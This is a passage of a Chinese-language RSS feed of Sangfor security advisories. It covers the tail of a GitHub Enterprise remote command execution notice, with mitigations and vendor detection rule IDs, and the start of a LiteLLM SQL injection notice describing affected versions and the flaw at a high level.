border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041762" src="https://wechat2rss.xlab.app/img-proxy/?k=966f3294&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxRt8b1jMTBmHu8LquHg0IB6AnHd9XwpTtOcn0xk8aCNqndYxS1oZVyWATXMmXRCwng6wNXdyMNImMlbXCfTxTdlzT20xC7pzqM%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">临时修复建议</span></span></strong></p></div></div></div></div><p style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">关闭未使用的功能模块，减少潜在攻击入口。</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">遵循最小权限原则，严控各类敏感操作权限范围。</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">非必要不暴露服务到公网，限制访问源为可信范围。</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">定期更新系统及各类组件至安全版本，及时修补已知隐患。</span></p></li></ul></p><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041767" src="https://wechat2rss.xlab.app/img-proxy/?k=99e9813d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FAPc6NwjLsxQ6krgDIXRuPUAnlQ3qtmrERj6j2YyXunqALloG3JeNEZPh89X1eVbb6bwTOwZZmyarWwhtUbibAutISwS87cfwwzkKsCmnDVv4%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">深信服解决方案</span></strong></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">1、风险资产发现</span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">支持对Github-Enterprise的主动检测，</span><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">可批量检出业务场景中该事件的受影响资产情况，</span></span></strong><span leaf="">相关产品如下：</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服云镜YJ】</span></span></strong><span leaf=""> 已发布资产检测方案，指纹ID:0001349。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服漏洞评估工具TSS】</span></span></strong><span leaf="">已发布资产检测方案，指纹ID:0001349。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">2、漏洞主动检测</span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">支持对Github-Enterprise远程命令执行漏洞(CVE-2026-3854)的主动检测，</span><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">可批量快速检出业务场景中是否存在漏洞风险，</span></span></strong><span leaf="">相关产品如下：</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服云镜YJ】</span></span></strong><span leaf="">预计2026年05月06日发布检测方案，规则ID:SF-2026-00906。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服漏洞评估工具TSS】</span></span></strong><span leaf="">预计2026年05月30日发布检测方案，规则ID:SF-2026-01017。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服安全托管服务MSS】</span></span></strong><span leaf="">预计2026年05月30日发布检测方案（需要具备TSS组件能力），规则ID:SF-2026-01017。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服可拓展检测响应平台XDR】</span></span></strong><span leaf="">预计2026年05月06日发布检测方案（需要具备云镜组件能力），规则ID:SF-2026-00906。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">3、漏洞安全监测</span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">支持对Github-Enterprise远程命令执行漏洞(CVE-2026-3854)的监测，</span><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">可依据流量收集实时监控业务场景中的受影响资产情况，快速检查受影响范围，</span></span></strong><span leaf="">相关产品及服务如下：</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服安全感知管理平台SIP】</span></span></strong><span leaf="">预计2026年05月11日发布监测方案，规则ID:11220423。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服安全托管服务MSS】</span></span></strong><span leaf="">预计2026年05月11日发布监测方案（需要具备SIP组件能力），规则ID:11220423。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服可拓展检测响应平台XDR】</span></span></strong><span leaf="">预计2026年05月11日发布监测方案，规则ID:11220423。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">4、漏洞安全防护</span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">支持对Github-Enterprise远程命令执行漏洞(CVE-2026-3854)的防御，</span><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">可阻断攻击者针对该事件的入侵行为，</span></span></strong><span leaf="">相关产品及服务如下：</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服下一代防火墙AF】</span></span></strong><span leaf="">预计2026年05月11日发布防护方案，规则ID:11220423。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服Web应用防火墙WAF】</span></span></strong><span leaf="">预计2026年05月11日发布防护方案，规则ID:11220423。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服安全托管服务MSS】</span></span></strong><span leaf="">预计2026年05月11日发布防护方案（需要具备AF组件能力），规则ID:11220423。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服可拓展检测响应平台XDR】</span></span></strong><span leaf="">预计2026年05月11日发布防护方案（需要具备AF组件能力），规则ID:11220423。</span></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">参考链接</span></b></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/advisories/ghsa-64fw-jx9p-5j24" target="_blank">https://github.com/advisories/ghsa-64fw-jx9p-5j24</a></span></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;font-size: 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">时间轴</span></b></p></div></div></div></div><div style="text-align: left;justify-content: flex-start;margin: 10px 0%;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="padding: 0px 6px;text-align: center;color: rgb(56, 52, 52);letter-spacing: 1px;line-height: 1;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">2026/04/29</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;box-shadow: rgb(102, 188, 41) 0px 0px 0px;border-left: 2px dotted rgb(102, 188, 41);border-bottom-left-radius: 0px;flex: 100 100 0%;align-self: flex-start;height: auto;margin: 0px 6px 0px 12px;padding: 9px 16px 20px 24px;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(102, 102, 102);text-align: justify;letter-spacing: 1px;line-height: 1.6;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">深瞳漏洞实验室监测到Github-Enterprise远程命令执行漏洞信息。</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;margin: 10px 0%;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="padding: 0px 6px;text-align: center;color: rgb(56, 52, 52);letter-spacing: 1px;line-height: 1;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">2026/04/29</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;box-shadow: rgb(102, 188, 41) 0px 0px 0px;border-left: 2px dotted rgb(102, 188, 41);border-bottom-left-radius: 0px;flex: 100 100 0%;align-self: flex-start;height: auto;margin: 0px 6px 0px 12px;padding: 9px 16px 20px 24px;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(102, 102, 102);text-align: justify;letter-spacing: 1px;line-height: 1.6;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">深瞳漏洞实验室发布漏洞通告。</span></p></div></div></div><div style="text-align: unset;font-size: 15px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">点击</span><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">阅读原文</span></span></strong><span leaf="">，及时关注并登录深信服</span><strong style="box-sizing: border-box;"><span leaf="">智安全平台</span></strong><span leaf="">，可轻松查询漏洞相关解决方案。</span></p></div><div style="text-align: unset;font-size: 15px;box-sizing: border-box;"><p style="text-align: center;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100041771" data-ratio="0.5" data-s="300,640" type="block" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=3a8af92c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FAPc6NwjLsxRbglXFicqDuFK7nIr2p9Dwxgy4tQbD4zf3WsyoTUdiaoAaOqcQbk1kPZvUun9AcerrlrxG1Lj3eHXWWA3wXvBibVwo8mRZgu4ppE%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.4" data-s="300,640" data-type="jpeg" data-w="1280" type="block" data-imgfileid="100039351" src="https://wechat2rss.xlab.app/img-proxy/?k=ca59cfa2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2Fw8NHw6tcQ5zvcIHbwGGYKbqDVYsVKzNNia1jYtHf49C7133AlDXAgex2W4lFvpia56tjQQDkiauNBrl08YbxqG01A%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p><a href="https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2026_09416%5cx26amp;lang=ZH-CN">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=e0712c01&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzg2NjgzNjA5NQ%3D%3D%26mid%3D2247525429%26idx%3D1%26sn%3Defffa2a9040316ec6d7753bd4b59e865">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Wed, 29 Apr 2026 20:25:00 +0800</pubDate>
    </item>
    <item>
      <title>【漏洞通告】LiteLLM SQL注入漏洞(CVE-2026-42208)</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzg2NjgzNjA5NQ==&amp;mid=2247525429&amp;idx=2&amp;sn=576d9806998fdf7f0dbf7b40e17dcfcb</link>
      <description>2026年4月28日，深瞳漏洞实验室监测到一则LiteLLM组件存在SQL注入漏洞的信息，漏洞编号：CVE-2026-42208，漏洞威胁等级：严重。</description>
      <content:encoded><![CDATA[<p><span>深瞳漏洞实验室</span> <span>2026-04-29 20:25</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=be6d32e8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FAPc6NwjLsxQmccqXJIboKbtfibTQdOeujulibibelurzQ7o3Uy1kgBjhdKfXlxgb9C0oWXmQjXfVOYDL94mTNcOVBuKlHrbIZtJkiaUId1BwmL4%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>2026年4月28日，深瞳漏洞实验室监测到一则LiteLLM组件存在SQL注入漏洞的信息，漏洞编号：CVE-2026-42208，漏洞威胁等级：严重。</p>
  <div style="box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;font-size: 16px;color: rgb(62, 62, 62);" data-pm-slice="0 0 []"><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.16635687732342008" data-s="300,640" data-type="gif" data-w="1076" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041776" src="https://wechat2rss.xlab.app/img-proxy/?k=d421a207&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FAPc6NwjLsxQUjpKQcAsDoDhxIdricevPRqUehSBVxoJMI94OnxvUqlrBNFicOrrhZzSzkib6mZmos8Eia9LbcQV77bPpgB1xqJuCiclrne0h9VTQ%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 25px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 94%;vertical-align: top;border-style: solid;border-width: 1px;border-color: rgb(13, 74, 182);flex: 0 0 auto;align-self: flex-start;height: auto;box-shadow: rgb(13, 74, 182) 6px 6px 0px;background-color: rgb(255, 255, 255);box-sizing: border-box;"><div style="margin: 18px 0% 0px;box-sizing: border-box;"><div style="font-size: 15px;text-align: justify;line-height: 1.6;letter-spacing: 1px;padding: 0px 23px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">漏洞名称：</span></span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">LiteLLM SQL注入漏洞(CVE-2026-42208)</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">组件名称：</span></span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">LiteLLM</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">影响范围：</span></strong></span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">1.81.16≤version&lt;1.83.7</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">漏洞类型：</span></span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">SQL注入</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">利用条件：</span></strong></span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">1、用户认证：无需用户认证</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">2、前置条件：默认配置</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">3、触发方式：远程</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">综合评价：</span></span></strong></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">&lt;综合评定利用难度&gt;：容易，无需授权即可造成SQL注入。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">&lt;综合评定威胁等级&gt;：高危，能造成信息泄露。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">官方解决方案：</span></span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">已发布</span></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">漏洞分析</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041774" src="https://wechat2rss.xlab.app/img-proxy/?k=2e4a8c21&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FAPc6NwjLsxQR3FplibtObnZH2o5293phNB0mMjkTsricr1icsLsKEt82FKg6ibINcNQKGOacCctiaK5ZuSHDe973j0YcibOxPBZBtYicwSJHv1VJmY%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">组件介绍</span></b></p></div></div></div></div><div style="margin: 25px 0%;box-sizing: border-box;"><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);padding: 0px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">LiteLLM是一款AI工具产品，该产品旨在为用户提供一个统一的API，以便访问和管理100多个LLM服务，它的核心功能是简化LLM的集成过程，帮助用户跟踪LLM使用情况，并设置预算和速率限制。</span></p></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041772" src="https://wechat2rss.xlab.app/img-proxy/?k=42501a99&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxT2ibZlARBrtSNgOQgialKpo35npyH7C7tliciaqmOnuRFico6XCIQc2Ziaf08l0MXQmAROPZ7Zr1W1tFGU8ZlDDOLwpnN5hw3yJpRwE%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">漏洞简介</span></strong></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">2026年4月28日，深瞳漏洞实验室监测到一则LiteLLM组件存在SQL注入漏洞的信息，漏洞编号：CVE-2026-42208，漏洞威胁等级：严重。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">CVE-2026-42208是 LiteLLM 一个认证流程 SQL 注入漏洞。由于系统在处理Authorization头的鉴权令牌时，未做过滤和预处理，导致攻击者可在认证阶段构造恶意token注入SQL。该漏洞位于身份认证失败后的错误日志机制，影响所有触发认证逻辑的接口，</span><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">攻击者无需有效凭据即可执行数据库查询，可能导致敏感信息泄露甚至远程控制系统。</span></span></strong></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 